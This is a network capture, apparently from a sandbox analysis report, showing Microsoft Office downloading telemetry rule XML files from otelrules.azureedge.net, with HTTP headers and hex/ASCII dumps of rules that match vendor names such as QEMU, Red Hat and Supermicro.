                                                        2024-11-12 15:27:12 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        89192.168.2.64981713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:12 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:12 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:12 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 474
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                        ETag: "0x8DC582BB3F48DAE"
                                                        x-ms-request-id: 5267c52a-501e-007b-64a0-345ba2000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152712Z-17df447cdb5g2j9ghC1DFWuyag00000006bg00000000998e
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:12 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.64981813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:12 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:12 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:12 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 408
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                        ETag: "0x8DC582BB9B6040B"
                                                        x-ms-request-id: ed171e7d-901e-0015-69a2-34b284000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152712Z-15869dbbcc6sg5zbhC1DFWy5u800000007qg00000000em77
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:12 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        91192.168.2.64981913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:12 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:12 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:12 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 469
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                        ETag: "0x8DC582BB3CAEBB8"
                                                        x-ms-request-id: 50e8b97d-601e-0070-17a0-34a0c9000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152712Z-17df447cdb5km9skhC1DFWy2rc0000000cr0000000005n8y
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:12 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.64982013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:12 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:13 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:13 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 416
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                        ETag: "0x8DC582BB5284CCE"
                                                        x-ms-request-id: ec03b74d-b01e-005c-11a1-344c66000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152713Z-17df447cdb59mt7dhC1DFWqpg40000000c500000000089r8
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:13 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        93192.168.2.64982113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:13 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:13 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:13 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 472
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                        ETag: "0x8DC582B91EAD002"
                                                        x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152713Z-16547b76f7f9bs6dhC1DFWt3rg0000000frg00000000h61n
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:13 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        94192.168.2.64982213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:13 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:13 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:13 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 432
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                        ETag: "0x8DC582BAABA2A10"
                                                        x-ms-request-id: e9278802-001e-002b-42a0-3499f2000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152713Z-15869dbbcc6sg5zbhC1DFWy5u800000007t000000000a7e0
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:13 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        95192.168.2.64982413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:13 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:13 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:13 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 427
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                        ETag: "0x8DC582BB464F255"
                                                        x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152713Z-16547b76f7fj5p7mhC1DFWf8w40000000fxg00000000d9nc
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:13 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        96192.168.2.64982513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:13 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:13 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:13 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 474
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                        ETag: "0x8DC582BA4037B0D"
                                                        x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152713Z-16547b76f7f7lhvnhC1DFWa2k00000000fu0000000001ty5
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:13 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.64982313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:14 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:14 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:14 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 475
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                        ETag: "0x8DC582BBA740822"
                                                        x-ms-request-id: f849fa6d-101e-00a2-16a3-349f2e000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152714Z-15869dbbcc6tfpj2hC1DFW384c00000009mg000000009rnu
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:14 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.64982613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:14 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:14 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:14 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 419
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                        ETag: "0x8DC582BA6CF78C8"
                                                        x-ms-request-id: 1ec43ba4-f01e-0003-65d2-2c4453000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152714Z-16547b76f7fx6rhxhC1DFW76kg0000000fq000000000n8x7
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:14 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.64982713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:14 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:14 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:14 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 472
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                        ETag: "0x8DC582B984BF177"
                                                        x-ms-request-id: 9ec2e68b-201e-0096-6cd2-2cace6000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152714Z-16547b76f7f775p5hC1DFWzdvn0000000fwg000000001vwh
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
